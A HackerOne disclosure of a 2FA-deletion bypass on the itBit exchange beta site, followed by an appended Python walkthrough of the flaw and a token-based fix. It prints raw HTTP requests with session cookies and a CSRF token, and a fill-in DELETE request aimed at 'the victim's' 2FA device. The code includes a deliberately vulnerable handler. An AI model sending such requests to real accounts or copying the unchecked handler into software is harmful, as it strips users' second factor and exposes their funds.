itBit Exchange: confirmation bypass of 2FA devices while they are deleting

2015-03-19T18:48:31
ID H1:52644
Type hackerone
Reporter defmax
Modified 2015-04-29T10:03:36

Description

Hey guys,

I just found a logical bug where I could bypass the confirmation of the 2FA devices.

While deleting a 2FA security device, this is the request made:

```
POST /api/user/devices/check_code HTTP/1.1
Host: beta.itbit.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: 3a87ae49-78a5-4c8e-8be2-543734823a11
X-Requested-With: XMLHttpRequest
Referer: https://beta.itbit.com/profile
Content-Length: 60
Cookie: _ga=GA1.2.1225775714.1425494989; hsPagesViewedThisSession=1939571595; __hstc=57227381.14b093bc9c7c6510d16b7274c74de6f8.1426789802053.1426789802053.1426789802053.1; __hssrc=1; __hssc=57227381.1.1426789802053; hsfirstvisit=https%3A%2F%2Fbeta.itbit.com%2F||1426789802050; hubspotutk=14b093bc9c7c6510d16b7274c74de6f8; itBit.b=s%3A646b81e2-046d-40d9-9217-00cf55f688aa.ZkeBj%2FHSZQRdTpy21Y23iBAxvuRuQcHdHn2Xhur757KOmmHBBEymVUC9%2FFg4Uz0tk1eGSU8%2BUqoy%2ByAn5I42MA; itBit.s=s%3A2aceed35-f7ae-4d25-8cbb-9dcff8d8396e.ZGxck5l%2FmemT4WYst%2B64oAN%2Bl5XPRTcRaWsr4Pq3RvQ
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

otpcode=928850&deviceid=9ed975d4-34ba-4057-8e21-db47ef2ccee9
```

If the otpcode is correct, it returns a 200 status and proceeds to the DELETE 2FA request, i.e.

```
DELETE /api/user/devices/9ed975d4-34ba-4057-8e21-db47ef2ccee9 HTTP/1.1
Host: beta.itbit.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-Token: 3a87ae49-78a5-4c8e-8be2-543734823a11
X-Requested-With: XMLHttpRequest
Referer: https://beta.itbit.com/profile
Cookie: _ga=GA1.2.1225775714.1425494989; hsPagesViewedThisSession=1939571595; __hstc=57227381.14b093bc9c7c6510d16b7274c74de6f8.1426789802053.1426789802053.1426789802053.1; __hssrc=1; __hssc=57227381.1.1426789802053; hsfirstvisit=https%3A%2F%2Fbeta.itbit.com%2F||1426789802050; hubspotutk=14b093bc9c7c6510d16b7274c74de6f8; itBit.b=s%3A646b81e2-046d-40d9-9217-00cf55f688aa.ZkeBj%2FHSZQRdTpy21Y23iBAxvuRuQcHdHn2Xhur757KOmmHBBEymVUC9%2FFg4Uz0tk1eGSU8%2BUqoy%2ByAn5I42MA; itBit.s=s%3A2aceed35-f7ae-4d25-8cbb-9dcff8d8396e.ZGxck5l%2FmemT4WYst%2B64oAN%2Bl5XPRTcRaWsr4Pq3RvQ
Connection: keep-alive
```

Here you can see that this is a plain request, i.e. without any otpcode validation while deleting!

To delete a 2FA device, just use this:

```
DELETE /api/user/devices/[[2FA_device_id]] HTTP/1.1
Host: beta.itbit.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-Token: 3a87ae49-78a5-4c8e-8be2-543734823a11
X-Requested-With: XMLHttpRequest
```

Fill in the 2FA_device_id with the victim's 2FA id and it will be deleted.

Fix

Just produce a token when the otpcode matches the device id, store it in a cookie or database, and validate the delete request with that token.

Hope this bug will be fixed soon.

Regards, N B
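The root cause in the report is that `check_code` and the `DELETE` endpoint are two unrelated requests: the server never records that the OTP step succeeded, so the delete can be sent on its own. The following is an added example, written for this page and not itBit's code or the reporter's, that models the two handlers in plain Python and shows the fix the report proposes: on a correct OTP the server mints a random, single-use, short-lived confirmation token bound to the session user and the device, and the delete handler refuses unless that exact token is presented. The in-memory `DEVICES` table, the device ids, the OTP values and the `CONFIRMATION_TTL` window are all constructed for the demo; `_otp_matches` stands in for real TOTP validation.

```python
import hmac
import secrets
import time

# Constructed in-memory state standing in for the exchange's backend (assumption,
# not itBit's code): each 2FA device record is keyed by device id and owned by a user.
DEVICES = {
    "dev-alice-0001": {"owner": "alice", "current_otp": "928850"},
    "dev-bob-0001": {"owner": "bob", "current_otp": "111111"},
}
# Pending deletion confirmations: token -> (owner, device id, expiry timestamp).
CONFIRMATIONS = {}
CONFIRMATION_TTL = 120  # seconds; a confirmation is worthless after this window


def _otp_matches(device_id, otpcode):
    """Stand-in for real TOTP validation: constant-time compare against the constructed code."""
    device = DEVICES.get(device_id)
    if device is None:
        return False
    return hmac.compare_digest(device["current_otp"], otpcode)


def delete_device_vulnerable(device_id):
    """Behaviour the report describes: DELETE looks the device up by id alone and
    never asks whether the OTP check for it ever succeeded. Returns an HTTP status."""
    if DEVICES.pop(device_id, None) is None:
        return 404
    return 200


def check_code(session_user, device_id, otpcode, now=None):
    """Hardened POST /api/user/devices/check_code: on a correct code, mint a random
    single-use confirmation token bound to this user and device. Returns (status, token)."""
    now = time.time() if now is None else now
    device = DEVICES.get(device_id)
    if device is None or device["owner"] != session_user:
        return 403, None  # not your device: do not reveal whether it exists
    if not _otp_matches(device_id, otpcode):
        return 403, None
    token = secrets.token_urlsafe(32)
    CONFIRMATIONS[token] = (session_user, device_id, now + CONFIRMATION_TTL)
    return 200, token


def delete_device_hardened(session_user, device_id, token, now=None):
    """Hardened DELETE /api/user/devices/{id}: refuse unless the caller presents a live
    confirmation minted for exactly this user and device. Any presented token is
    consumed, so a failed attempt forces the OTP step to be repeated."""
    now = time.time() if now is None else now
    record = CONFIRMATIONS.pop(token, None) if token else None
    if record is None:
        return 403
    owner, confirmed_device, expires = record
    if now > expires or owner != session_user or confirmed_device != device_id:
        return 403
    device = DEVICES.get(device_id)
    if device is None or device["owner"] != session_user:
        return 404
    del DEVICES[device_id]
    return 200


if __name__ == "__main__":
    # Walk through the fixed flow: wrong code, then correct code, then the bound delete.
    print(check_code("alice", "dev-alice-0001", "000000"))          # (403, None)
    status, tok = check_code("alice", "dev-alice-0001", "928850")   # (200, '<token>')
    print(status, delete_device_hardened("alice", "dev-alice-0001", tok))  # 200 200
```

The token is bound to three things at once: the session user (so a token confirmed in one account cannot delete a device in another), the device id (so confirming one device does not unlock deleting a different one), and a deadline. Popping it from `CONFIRMATIONS` on first use gives the single-use property; a production deployment would keep that table in the session store or database rather than process memory, as the report suggests.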